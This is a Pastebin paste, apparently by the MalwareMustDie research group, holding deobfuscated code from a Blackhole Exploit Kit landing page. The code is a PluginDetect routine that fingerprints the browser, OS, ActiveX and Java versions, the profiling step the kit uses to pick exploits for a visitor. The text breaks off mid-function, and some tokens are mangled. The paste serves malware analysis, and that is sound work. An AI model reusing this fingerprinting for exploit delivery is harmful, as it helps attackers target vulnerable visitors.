Advertisement
MalwareMustDie

#MMD - PluginDetect of BHEK2/Cridex at 59.57.247.185 2012121

Dec 15th, 2012
1,518
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 56.55 KB | None | 0 0
  1. // deobfs'd of BHEK landing page #MalwareMustDie 2012 Dec 16th
  2.  
  3. var PluginDetect = {
  4. version : "0.7.9", name : "PluginDetect", handler : function (c, b, a){
  5. return function (){
  6. c(b, a)
  7. }
  8. }
  9. , openTag : "<", isDefined : function (b){
  10. return typeof b != "undefined"
  11. }
  12. , isArray : function (b){
  13. return (/array/i).test(Object.prototype.toString.call(b))
  14. }
  15. , isFunc : function (b){
  16. return typeof b == "function"
  17. }
  18. , isString : function (b){
  19. return typeof b == "string"
  20. }
  21. , isNum : function (b){
  22. return typeof b == "number"
  23. }
  24. , isStrNum : function (b){
  25. return (typeof b == "string" && (/\d/).test(b))
  26. }
  27. , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g, getNum :
  28. function (b, c){
  29. var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
  30. exec(b) : null;
  31. return a ? a[0] : null
  32. }
  33. , compareNums : function (h, f, d){
  34. var e = this , c, b, a, g = parseInt;
  35. if (e.isStrNum(h) && e.isStrNum(f)){
  36. if (e.isDefined(d) && d.compareNums){
  37. return d.compareNums(h, f)
  38. }
  39. c = h.split(e.splitNumRegx);
  40. b = f.split(e.splitNumRegx);
  41. for (a = 0; a < Math.min(c.length, b.length);
  42. a ++ ){
  43. if (g(c[a], 10) > g(b[a], 10)){
  44. return 1
  45. }
  46. if (g(c[a], 10) < g(b[a], 10)){
  47. return - 1
  48. }
  49. }
  50. }
  51. return 0
  52. }
  53. , formatNum : function (b, c){
  54. var d = this , a, e;
  55. if (!d.isStrNum(b)){
  56. return null
  57. }
  58. if (!d.isNum(c)){
  59. c = 4
  60. }
  61. c--;
  62. e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
  63. for (a = 0; a < 4; a ++ ){
  64. if (/^(0+)(.+)$/.test(e[a])){
  65. e[a] = RegExp.$2
  66. }
  67. if (a > c ||! (/\d/).test(e[a])){
  68. e[a] = "0"
  69. }
  70. }
  71. return e.slice(0, 4).join(",")
  72. }
  73. , $$hasMimeType : function (a){
  74. return function (c){
  75. if (!a.isIE && c){
  76. var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
  77. for (b = 0; b < d.length; b ++ ){
  78. if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
  79. f = navigator.mimeTypes[d[b]];
  80. e = f ? f.enabledPlugin : 0;
  81. if (e && (e.name || e.description)){
  82. return f
  83. }
  84. }
  85. }
  86. }
  87. return null
  88. }
  89. }
  90. , findNavPlugin : function (l, e, c){
  91. var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
  92. new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
  93. for (f = 0; f < a.length; f ++ ){
  94. m = a[f].description || g;
  95. b = a[f].name || g;
  96. if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
  97. test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
  98. if (!k ||! (k.test(m) || k.test(b))){
  99. return a[f]
  100. }
  101. }
  102. }
  103. return null
  104. }
  105. , getMimeEnabledPlugin : function (k, m, c){
  106. var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a, l
  107. , d, j = e.isString(k) ? [k] : k;
  108. for (d = 0; d < j.length; d ++ ){
  109. if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
  110. l = f.description || h;
  111. a = f.name || h;
  112. if (b.test(l) || b.test(a)){
  113. if (!g ||! (g.test(l) || g.test(a))){
  114. return f
  115. }
  116. }
  117. }
  118. }
  119. return 0
  120. }
  121. , getPluginFileVersion : function (f, b){
  122. var h = this , e, d, g, a, c =- 1;
  123. if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
  124. return b
  125. }
  126. if (!b){
  127. return e
  128. }
  129. e = h.formatNum(e);
  130. b = h.formatNum(b);
  131. d = b.split(h.splitNumRegx);
  132. g = e.split(h.splitNumRegx);
  133. for (a = 0; a < d.length; a ++ ){
  134. if ( - 1 < c && c < a &&! (d[a] == "0")){
  135. return b
  136. }
  137. if (g[a] != d[a]){
  138. if (c ==- 1){
  139. c = a
  140. }
  141. if (d[a] != "0"){
  142. return b
  143. }
  144. }
  145. }
  146. return e
  147. }
  148. , AXO : window.ActiveXObject, getAXO : function (a){
  149. var f = null, d, b = this , c = {
  150. }
  151. ;
  152. try {
  153. f = new b.AXO(a)
  154. }
  155. catch (d){
  156. }
  157. return f
  158. }
  159. , convertFuncs : function (f){
  160. var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
  161. for (ain f){
  162. if (b.test(a)){
  163. try {
  164. g = a.slice(2);
  165. if (g.length > 0 &&! f[g]){
  166. f[g] = f[a](f);
  167. deletef[a]
  168. }
  169. }
  170. catch (d){
  171. }
  172. }
  173. }
  174. }
  175. , initObj : function (e, b, d){
  176. var a, c;
  177. if (e){
  178. if (e[b[0]] == 1 || d){
  179. for (a = 0; a < b.length; a = a + 2){
  180. e[b[a]] = b[a + 1]
  181. }
  182. }
  183. for (ain e){
  184. c = e[a];
  185. if (c && c[b[0]] == 1){
  186. this .initObj(c, b)
  187. }
  188. }
  189. }
  190. }
  191. , initScript : function (){
  192. var d = this , a = navigator, h, i = document, l = a.userAgent || "", j = a.vendor ||
  193. "", b = a.platform || "", k = a.product || "";
  194. d.initObj(d, ["$", d]);
  195. for (hin d.Plugins){
  196. if (d.Plugins[h]){
  197. d.initObj(d.Plugins[h], ["$", d, "$$", d.Plugins[h]], 1)
  198. }
  199. }
  200. d.convertFuncs(d);
  201. d.OS = 100;
  202. if (b){
  203. var g = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2,
  204. "iPad", 21.3, "Win." + "*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "",
  205. 100];
  206. for (h = g.length - 2; h >= 0; h = h - 2){
  207. if (g[h] && new RegExp(g[h], "i").test(b)){
  208. d.OS = g[h + 1];
  209. break
  210. }
  211. }
  212. }
  213. ;
  214. d.head = i.getElementsByTagName("head")[0] || i.getElementsByTagName("body")[0] || i.
  215. body || null;
  216. d.isIE = new Function("return/*@cc_on!@*/!1")();
  217. d.verIE = d.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(l) ? parseFloat(RegExp.$1, 10) : null
  218. ;
  219. d.ActiveXEnabled = false;
  220. if (d.isIE){
  221. var h, m = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
  222. "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
  223. "Scripting.Dictionary", "wmplayer.ocx"];
  224. for (h = 0; h < m.length; h ++ ){
  225. if (d.getAXO(m[h])){
  226. d.ActiveXEnabled = true;
  227. break
  228. }
  229. }
  230. }
  231. ;
  232. d.isGecko = (/Gecko\s*\/\s*\d/i).test(l) && (/Gecko/i).test(k);
  233. d.verGecko = d.isGecko ? d.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(l) ? RegExp.$1 :
  234. "0.9") : null;
  235. d.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(l);
  236. d.verChrome = d.isChrome ? d.formatNum(RegExp.$1) : null;
  237. d.isSafari = ((/Apple/i).test(j) || (!j &&! d.isChrome)) && (
  238. /Safari\s*\/\s*(\d[\d\.]*)/i).test(l);
  239. d.verSafari = d.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(l) ? d.formatNum(
  240. RegExp.$1) : null;
  241. d.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(l);
  242. d.verOpera = d.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(l) || 1) ? parseFloat(
  243. RegExp.$1, 10) : null;
  244. d.addWinEvent("load", d.handler(d.runWLfuncs, d))
  245. }
  246. , init : function (d){
  247. var c = this , b, d, a = {
  248. status :- 3, plugin : 0
  249. }
  250. ;
  251. if (!c.isString(d)){
  252. return a
  253. }
  254. if (d.length == 1){
  255. c.getVersionDelimiter = d;
  256. return a
  257. }
  258. d = d.toLowerCase().replace(/\s/g, "");
  259. b = c.Plugins[d];
  260. if (!b ||! b.getVersion){
  261. return a
  262. }
  263. a.plugin = b;
  264. if (!c.isDefined(b.installed)){
  265. b.installed = null;
  266. b.version = null;
  267. b.version0 = null;
  268. b.getVersionDone = null;
  269. b.pluginName = d
  270. }
  271. c.garbage = false;
  272. if (c.isIE &&! c.ActiveXEnabled && d !== "Ja" + "va"){
  273. a.status =- 2;
  274. return a
  275. }
  276. a.status = 1;
  277. return a
  278. }
  279. , fPush : function (b, a){
  280. var c = this ;
  281. if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && c.isFunc(b[0]) && 0 < b.length
  282. ))){
  283. a.push(b)
  284. }
  285. }
  286. , callArray : function (b){
  287. var c = this , a;
  288. if (c.isArray(b)){
  289. for (a = 0; a < b.length; a ++ ){
  290. if (b[a] === null){
  291. return
  292. }
  293. c.call(b[a]);
  294. b[a] = null
  295. }
  296. }
  297. }
  298. , call : function (c){
  299. var b = this , a = b.isArray(c) ? c.length :- 1;
  300. if (0 < a && b.isFunc(c[0])){
  301. c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
  302. }
  303. else {
  304. if (b.isFunc(c)){
  305. c(b)
  306. }
  307. }
  308. }
  309. , $$isMinVersion : function (a){
  310. return function (h, g, d, c){
  311. var e = a.init(h), f, b =- 1, j = {
  312. }
  313. ;
  314. if (e.status < 0){
  315. return e.status
  316. }
  317. f = e.plugin;
  318. g = a.formatNum(a.isNum(g) ? g.toString() : (a.isStrNum(g) ? a.getNum(g) : "0"));
  319. if (f.getVersionDone != 1){
  320. f.getVersion(g, d, c);
  321. if (f.getVersionDone === null){
  322. f.getVersionDone = 1
  323. }
  324. }
  325. a.cleanup();
  326. if (f.installed !== null){
  327. b = f.installed <= 0.5 ? f.installed : (f.installed == 0.7 ? 1 : (f.version ===
  328. null ? 0 : (a.compareNums(f.version, g, f) >= 0 ? 1 :- 0.1)))
  329. }
  330. ;
  331. return b
  332. }
  333. }
  334. , getVersionDelimiter : ",", $$getVersion : function (a){
  335. return function (g, d, c){
  336. var e = a.init(g), f, b, h = {
  337. }
  338. ;
  339. if (e.status < 0){
  340. return null
  341. }
  342. ;
  343. f = e.plugin;
  344. if (f.getVersionDone != 1){
  345. f.getVersion(null, d, c);
  346. if (f.getVersionDone === null){
  347. f.getVersionDone = 1
  348. }
  349. }
  350. a.cleanup();
  351. b = (f.version || f.version0);
  352. b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
  353. return b
  354. }
  355. }
  356. , cleanup : function (){
  357. var a = this ;
  358. if (a.garbage && a.isDefined(window.CollectGarbage)){
  359. window.CollectGarbage()
  360. }
  361. }
  362. , addWinEvent : function (d, c){
  363. var e = this , a = window, b;
  364. if (e.isFunc(c)){
  365. if (a.addEventListener){
  366. a.addEventListener(d, c, false)
  367. }
  368. else {
  369. if (a.attachEvent){
  370. a.attachEvent("on" + d, c)
  371. }
  372. else {
  373. b = a["on" + d];
  374. a["on" + d] = e.winHandler(c, b)
  375. }
  376. }
  377. }
  378. }
  379. , winHandler : function (d, c){
  380. return function (){
  381. d();
  382. if (typeof c == "function"){
  383. c()
  384. }
  385. }
  386. }
  387. , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
  388. var b = {
  389. }
  390. ;
  391. a.winLoaded = true;
  392. a.callArray(a.WLfuncs0);
  393. a.callArray(a.WLfuncs);
  394. if (a.onDoneEmptyDiv){
  395. a.onDoneEmptyDiv()
  396. }
  397. }
  398. , winLoaded : false, $$onWindowLoaded : function (a){
  399. return function (b){
  400. if (a.winLoaded){
  401. a.call(b)
  402. }
  403. else {
  404. a.fPush(b, a.WLfuncs)
  405. }
  406. }
  407. }
  408. , $$onDetectionDone : function (a){
  409. return function (h, g, c, b){
  410. var d = a.init(h), k, e, j = {
  411. }
  412. ;
  413. if (d.status ==- 3){
  414. return - 1
  415. }
  416. e = d.plugin;
  417. if (!a.isArray(e.funcs)){
  418. e.funcs = []
  419. }
  420. if (e.getVersionDone != 1){
  421. k = a.isMinVersion ? a.isMinVersion(h, "0", c, b) : a.getVersion(h, c, b)
  422. }
  423. if (e.installed !=- 0.5 && e.installed != 0.5){
  424. a.call(g);
  425. return 1
  426. }
  427. if (e.NOTF){
  428. a.fPush(g, e.funcs);
  429. return 0
  430. }
  431. return 1
  432. }
  433. }
  434. , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv : function
  435. (){
  436. var d = this , b, h, c, a, f, g;
  437. if (d.div && d.div.childNodes){
  438. for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
  439. c = d.div.childNodes[b];
  440. if (c && c.childNodes){
  441. for (h = c.childNodes.length - 1; h >= 0; h -- ){
  442. g = c.childNodes[h];
  443. try {
  444. c.removeChild(g)
  445. }
  446. catch (f){
  447. }
  448. }
  449. }
  450. if (c){
  451. try {
  452. d.div.removeChild(c)
  453. }
  454. catch (f){
  455. }
  456. }
  457. }
  458. }
  459. if (!d.div){
  460. a = document.getElementById(d.divID);
  461. if (a){
  462. d.div = a
  463. }
  464. }
  465. if (d.div && d.div.parentNode){
  466. try {
  467. d.div.parentNode.removeChild(d.div)
  468. }
  469. catch (f){
  470. }
  471. d.div = null
  472. }
  473. }
  474. , DONEfuncs : [], onDoneEmptyDiv : function (){
  475. var c = this , a, b;
  476. if (!c.winLoaded){
  477. return
  478. }
  479. if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
  480. return
  481. }
  482. for (ain c){
  483. b = c[a];
  484. if (b && b.funcs){
  485. if (b.OTF == 3){
  486. return
  487. }
  488. if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
  489. return
  490. }
  491. }
  492. }
  493. for (a = 0; a < c.DONEfuncs.length; a ++ ){
  494. c.callArray(c.DONEfuncs)
  495. }
  496. c.emptyDiv()
  497. }
  498. , getWidth : function (c){
  499. if (c){
  500. var a = c.scrollWidth || c.offsetWidth, b = this ;
  501. if (b.isNum(a)){
  502. return a
  503. }
  504. }
  505. return - 1
  506. }
  507. , getTagStatus : function (m, g, a, b){
  508. var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d = g.
  509. span, i = c.getWidth(d);
  510. if (!k ||! h ||! d ||! c.getDOMobj(m)){
  511. return - 2
  512. }
  513. if (j < i || 0 > l || 0 > j || 0 > i || i <= c.pluginSize || c.pluginSize < 1){
  514. return 0
  515. }
  516. if (l >= i){
  517. return - 1
  518. }
  519. try {
  520. if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
  521. if (!m.winLoaded && c.winLoaded){
  522. return 1
  523. }
  524. if (m.winLoaded && c.isNum(b)){
  525. if (!c.isNum(m.count)){
  526. m.count = b
  527. }
  528. if (b - m.count >= 10){
  529. return 1
  530. }
  531. }
  532. }
  533. }
  534. catch (f){
  535. }
  536. return 0
  537. }
  538. , getDOMobj : function (g, a){
  539. var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
  540. try {
  541. if (b && a){
  542. d.div.focus()
  543. }
  544. }
  545. catch (f){
  546. }
  547. return b ? c.firstChild : null
  548. }
  549. , setStyle : function (b, g){
  550. var f = b.style, a, d, c = this ;
  551. if (f && g){
  552. for (a = 0; a < g.length; a = a + 2){
  553. try {
  554. f[g[a]] = g[a + 1]
  555. }
  556. catch (d){
  557. }
  558. }
  559. }
  560. }
  561. , insertDivInBody : function (i, g){
  562. var f, c = this , h = "pd33993399", b = null, d = g ? window.top.document : window.
  563. document, a = d.getElementsByTagName("body")[0] || d.body;
  564. if (!a){
  565. try {
  566. d.write('<div id="' + h + '">.' + c.openTag + "/div>");
  567. b = d.getElementById(h)
  568. }
  569. catch (f){
  570. }
  571. }
  572. a = d.getElementsByTagName("body")[0] || d.body;
  573. if (a){
  574. a.insertBefore(i, a.firstChild);
  575. if (b){
  576. a.removeChild(b)
  577. }
  578. }
  579. }
  580. , insertHTML : function (f, b, g, a, k){
  581. var l, m = document, j = this , p, o = m.createElement("span"), n, i;
  582. var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
  583. "0px", "visibility", "visible"];
  584. var h =
  585. "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
  586. if (!j.isDefined(a)){
  587. a = ""
  588. }
  589. if (j.isString(f) && (/[^\s]/).test(f)){
  590. f = f.toLowerCase().replace(/\s/g, "");
  591. p = j.openTag + f + ' width="' + j.pluginSize + '" height="' + j.pluginSize + '" ';
  592. p += 'style="' + h + 'display:inline;" ';
  593. for (n = 0; n < b.length; n = n + 2){
  594. if (/[^\s]/.test(b[n + 1])){
  595. p += b[n] + '="' + b[n + 1] + '" '
  596. }
  597. }
  598. p += ">";
  599. for (n = 0; n < g.length; n = n + 2){
  600. if (/[^\s]/.test(g[n + 1])){
  601. p += j.openTag + 'param name="' + g[n] + '" value="' + g[n + 1] + '" />'
  602. }
  603. }
  604. p += a + j.openTag + "/" + f + ">"
  605. }
  606. else {
  607. p = a
  608. }
  609. if (!j.div){
  610. i = m.getElementById(j.divID);
  611. if (i){
  612. j.div = i
  613. }
  614. else {
  615. j.div = m.createElement("div");
  616. j.div.id = j.divID
  617. }
  618. j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3)
  619. + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) +
  620. "px", "verticalAlign", "baseline", "display", "block"]));
  621. if (!i){
  622. j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"]);
  623. j.insertDivInBody(j.div)
  624. }
  625. }
  626. if (j.div && j.div.parentNode){
  627. j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.
  628. pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
  629. try {
  630. o.innerHTML = p
  631. }
  632. catch (l){
  633. }
  634. ;
  635. try {
  636. j.div.appendChild(o)
  637. }
  638. catch (l){
  639. }
  640. ;
  641. return {
  642. span : o, winLoaded : j.winLoaded, tagName : f, outerHTML : p
  643. }
  644. }
  645. return {
  646. span : null, winLoaded : j.winLoaded, tagName : "", outerHTML : p
  647. }
  648. }
  649. , file : {
  650. $ : 1, any : "fileStorageAny999", valid : "fileStorageValid999", save : function (d, f
  651. , c){
  652. var b = this , e = b.$, a;
  653. if (d && e.isDefined(c)){
  654. if (!d[b.any]){
  655. d[b.any] = []
  656. }
  657. if (!d[b.valid]){
  658. d[b.valid] = []
  659. }
  660. d[b.any].push(c);
  661. a = b.split(f, c);
  662. if (a){
  663. d[b.valid].push(a)
  664. }
  665. }
  666. }
  667. , getValidLength : function (a){
  668. return a && a[this .valid] ? a[this .valid].length : 0
  669. }
  670. , getAnyLength : function (a){
  671. return a && a[this .any] ? a[this .any].length : 0
  672. }
  673. , getValid : function (c, a){
  674. var b = this ;
  675. return c && c[b.valid] ? b.get(c[b.valid], a) : null
  676. }
  677. , getAny : function (c, a){
  678. var b = this ;
  679. return c && c[b.any] ? b.get(c[b.any], a) : null
  680. }
  681. , get : function (d, a){
  682. var c = d.length - 1, b = this .$.isNum(a) ? a : c;
  683. return (0 > b || b > c) ? null : d[b]
  684. }
  685. , split : function (g, c){
  686. var b = this , e = b.$, f = null, a, d;
  687. g = g ? g.replace(".", "\.") : "";
  688. d = new RegExp("^(.*[^\/])(" + g + "\s*)$");
  689. if (e.isString(c) && d.test(c)){
  690. a = (RegExp.$1).split("/");
  691. f = {
  692. name : a[a.length - 1], ext : RegExp.$2, full : c
  693. }
  694. ;
  695. a[a.length - 1] = "";
  696. f.path = a.join("/")
  697. }
  698. return f
  699. }
  700. , z : 0
  701. }
  702. , Plugins : {
  703. java : {
  704. mimeType : ["application/x-java-applet", "application/x-java-vm",
  705. "application/x-java-bean"], classID : "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
  706. navigator : {
  707. a : window.navigator.javaEnabled(), javaEnabled : function (){
  708. return this .a
  709. }
  710. , mimeObj : 0, pluginObj : 0
  711. }
  712. , OTF : null, minIEver : 7, debug : 0, debugEnable : function (){
  713. var a = this , b = a.$;
  714. a.debug = 1
  715. }
  716. , isDisabled : {
  717. $ : 1, DTK : function (){
  718. var a = this , c = a.$, b = a.$$;
  719. if ((c.isGecko && c.compareNums(c.verGecko, c.formatNum("1.6")) <= 0) || (c.
  720. isSafari && c.OS == 1 && (!c.verSafari || 0 > c.compareNums(c.verSafari,
  721. "5,1,0,0"))) || c.isChrome || (c.isIE &&! c.ActiveXEnabled)){
  722. return 1
  723. }
  724. return 0
  725. }
  726. , AXO : function (){
  727. var a = this , c = a.$, b = a.$$;
  728. return (!c.isIE ||! c.ActiveXEnabled || (!b.debug && b.DTK.query().status !== 0
  729. ))
  730. }
  731. , navMime : function (){
  732. var b = this , d = b.$, c = b.$$, a = c.navigator;
  733. if (d.isIE ||! a.mimeObj ||! a.pluginObj){
  734. return 1
  735. }
  736. return 0
  737. }
  738. , navPlugin : function (){
  739. var b = this , d = b.$, c = b.$$, a = c.navigator;
  740. if (d.isIE ||! a.mimeObj ||! a.pluginObj){
  741. return 1
  742. }
  743. return 0
  744. }
  745. , windowDotJava : function (){
  746. var a = this , c = a.$, b = a.$$;
  747. if (!window.java){
  748. return 1
  749. }
  750. if (c.OS == 2 && c.verOpera > 8 && c.verOpera && c.verOpera < (9.3 - 0.1)){
  751. return 1
  752. }
  753. return 0
  754. }
  755. , allApplets : function (){
  756. var b = this , d = b.$, c = b.$$, a = c.navigator;
  757. if (d.OS >= 20){
  758. return 0
  759. }
  760. if (d.verOpera && d.verOpera < 11 &&! a.javaEnabled() &&! c.lang.System.
  761. getProperty()[0]){
  762. return 1
  763. }
  764. if ((d.verGecko && 0 > d.compareNums(d.verGecko, d.formatNum("2"))) &&! a.
  765. mimeObj &&! c.lang.System.getProperty()[0]){
  766. return 1
  767. }
  768. return 0
  769. }
  770. , AppletTag : function (){
  771. var b = this , d = b.$, c = b.$$, a = c.navigator;
  772. return d.isIE ?! a.javaEnabled() : 0
  773. }
  774. , ObjectTag : function (){
  775. var a = this , c = a.$, b = a.$$;
  776. return c.isIE ?! c.ActiveXEnabled : 0
  777. }
  778. , z : 0
  779. }
  780. , getVerifyTagsDefault : function (){
  781. var a = this , c = a.$, b = [1, 0, 1];
  782. if (c.OS >= 20){
  783. return b
  784. }
  785. if ((c.isIE && (c.verIE < 9 ||! c.ActiveXEnabled)) || (c.verGecko && 0 > c.
  786. compareNums(c.verGecko, c.formatNum("2"))) || (c.isSafari && (!c.verSafari || 0 >
  787. c.compareNums(c.verSafari, c.formatNum("4")))) || (c.verOpera && c.verOpera < 10
  788. )){
  789. b = [1, 1, 1]
  790. }
  791. return b
  792. }
  793. , getVersion : function (j, g, i){
  794. var b = this , d = b.$, e, a = b.applet, h = b.verify, k = b.navigator, f = null,
  795. l = null, c = null;
  796. if (b.getVersionDone === null){
  797. b.OTF = 0;
  798. k.mimeObj = d.hasMimeType(b.mimeType);
  799. if (k.mimeObj){
  800. k.pluginObj = k.mimeObj.enabledPlugin
  801. }
  802. if (h){
  803. h.begin()
  804. }
  805. }
  806. a.setVerifyTagsArray(i);
  807. d.file.save(b, ".jar", g);
  808. if (b.getVersionDone === 0){
  809. if (a.should_Insert_Query_Any()){
  810. e = a.insert_Query_Any();
  811. b.setPluginStatus(e[0], e[1], f)
  812. }
  813. return
  814. }
  815. if ((!f || b.debug) && b.DTK.query().version){
  816. f = b.DTK.version
  817. }
  818. if ((!f || b.debug) && b.navMime.query().version){
  819. f = b.navMime.version
  820. }
  821. if ((!f || b.debug) && b.navPlugin.query().version){
  822. f = b.navPlugin.version
  823. }
  824. if ((!f || b.debug) && b.AXO.query().version){
  825. f = b.AXO.version
  826. }
  827. if (b.nonAppletDetectionOk(f)){
  828. c = f
  829. }
  830. if (!c || b.debug || a.VerifyTagsHas(2.2) || a.VerifyTagsHas(2.5)){
  831. e = b.lang.System.getProperty();
  832. if (e[0]){
  833. f = e[0];
  834. c = e[0];
  835. l = e[1]
  836. }
  837. }
  838. b.setPluginStatus(c, l, f);
  839. if (a.should_Insert_Query_Any()){
  840. e = a.insert_Query_Any();
  841. if (e[0]){
  842. c = e[0];
  843. l = e[1]
  844. }
  845. }
  846. b.setPluginStatus(c, l, f)
  847. }
  848. , nonAppletDetectionOk : function (b){
  849. var d = this , e = d.$, a = d.navigator, c = 1;
  850. if (!b || (!a.javaEnabled() &&! d.lang.System.getPropertyHas(b)) || (!e.isIE &&! a
  851. .mimeObj &&! d.lang.System.getPropertyHas(b)) || (e.isIE &&! e.ActiveXEnabled)){
  852. c = 0
  853. }
  854. else {
  855. if (e.OS >= 20){
  856. }
  857. else {
  858. if (d.info && 0 > d.info.getPlugin2Status() && d.info.BrowserRequiresPlugin2
  859. ()){
  860. c = 0
  861. }
  862. }
  863. }
  864. return c
  865. }
  866. , setPluginStatus : function (d, f, a){
  867. var c = this , e = c.$, b;
  868. a = a || c.version0;
  869. if (0 < c.OTF){
  870. d = d || c.lang.System.getProperty()[0]
  871. }
  872. if (c.OTF < 3){
  873. b = d ? 1 : (a ?- 0.2 :- 1);
  874. if (c.installed === null || b > c.installed){
  875. c.installed = b
  876. }
  877. }
  878. if (c.OTF == 2 && c.NOTF &&! c.applet.getResult()[0] &&! c.lang.System.getProperty
  879. ()[0]){
  880. c.installed = a ?- 0.2 :- 1
  881. }
  882. ;
  883. if (c.OTF == 3 && c.installed !=- 0.5 && c.installed != 0.5){
  884. c.installed = (c.NOTF.isJavaActive(1) == 1 || c.lang.System.getProperty()[0]) ?
  885. 0.5 :- 0.5
  886. }
  887. if (c.OTF == 4 && (c.installed ==- 0.5 || c.installed == 0.5)){
  888. if (d){
  889. c.installed = 1
  890. }
  891. else {
  892. if (c.NOTF.isJavaActive(1) == 1){
  893. if (a){
  894. c.installed = 1;
  895. d = a
  896. }
  897. else {
  898. c.installed = 0
  899. }
  900. }
  901. else {
  902. if (a){
  903. c.installed =- 0.2
  904. }
  905. else {
  906. c.installed =- 1
  907. }
  908. }
  909. }
  910. }
  911. ;
  912. if (a){
  913. c.version0 = e.formatNum(e.getNum(a))
  914. }
  915. if (d){
  916. c.version = e.formatNum(e.getNum(d))
  917. }
  918. if (f && e.isString(f)){
  919. c.vendor = f
  920. }
  921. if (!c.vendor){
  922. c.vendor = ""
  923. }
  924. if (c.verify && c.verify.isEnabled()){
  925. c.getVersionDone = 0
  926. }
  927. else {
  928. if (c.getVersionDone != 1){
  929. if (c.OTF < 2){
  930. c.getVersionDone = 0
  931. }
  932. else {
  933. c.getVersionDone = c.applet.can_Insert_Query_Any() ? 0 : 1
  934. }
  935. }
  936. }
  937. }
  938. , DTK : {
  939. $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null,
  940. Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA",
  941. "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [
  942. "application/java-deployment-toolkit",
  943. "application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled : function
  944. (){
  945. return this .$$.isDisabled.DTK()
  946. }
  947. , query : function (){
  948. var k = this , g = k.$, d = k.$$, j, l, h, m = {
  949. }
  950. , f = {
  951. }
  952. , a, c = null, i = null, b = (k.hasRun || k.disabled());
  953. k.hasRun = 1;
  954. if (b){
  955. return k
  956. }
  957. k.status = 0;
  958. if (g.isIE && 6 <= g.verIE){
  959. for (l = 0; l < k.classID.length; l ++ ){
  960. k.HTML = g.insertHTML("object", ["classid", k.classID[l]], []);
  961. c = g.getDOMobj(k.HTML);
  962. try {
  963. if (c && c.jvms){
  964. break
  965. }
  966. }
  967. catch (j){
  968. }
  969. }
  970. }
  971. else {
  972. if (!g.isIE && (h = g.hasMimeType(k.mimeType)) && h.type){
  973. k.HTML = g.insertHTML("object", ["type", h.type], []);
  974. c = g.getDOMobj(k.HTML)
  975. }
  976. }
  977. if (c){
  978. try {
  979. a = c.jvms;
  980. if (a){
  981. i = a.getLength();
  982. if (g.isNum(i)){
  983. k.status = 0 < i ? 1 :- 1;
  984. for (l = 0; l < i; l ++ ){
  985. h = g.getNum(a.get(i - 1 - l).version);
  986. if (h){
  987. k.VERSIONS.push(h);
  988. f["a" + g.formatNum(h)] = 1
  989. }
  990. }
  991. }
  992. }
  993. }
  994. catch (j){
  995. }
  996. }
  997. h = 0;
  998. for (lin f){
  999. h ++
  1000. }
  1001. if (h && h !== k.VERSIONS.length){
  1002. k.VERSIONS = []
  1003. }
  1004. if (k.VERSIONS.length){
  1005. k.version = g.formatNum(k.VERSIONS[0])
  1006. }
  1007. ;
  1008. return k
  1009. }
  1010. }
  1011. , AXO : {
  1012. $ : 1, hasRun : 0, VERSIONS : [], version : "", disabled : function (){
  1013. return this .$$.isDisabled.AXO()
  1014. }
  1015. , JavaVersions : [[1, 9, 1, 40], [1, 8, 1, 40], [1, 7, 1, 40], [1, 6, 0, 40], [1,
  1016. 5, 0, 30], [1, 4, 2, 30], [1, 3, 1, 30]], query : function (){
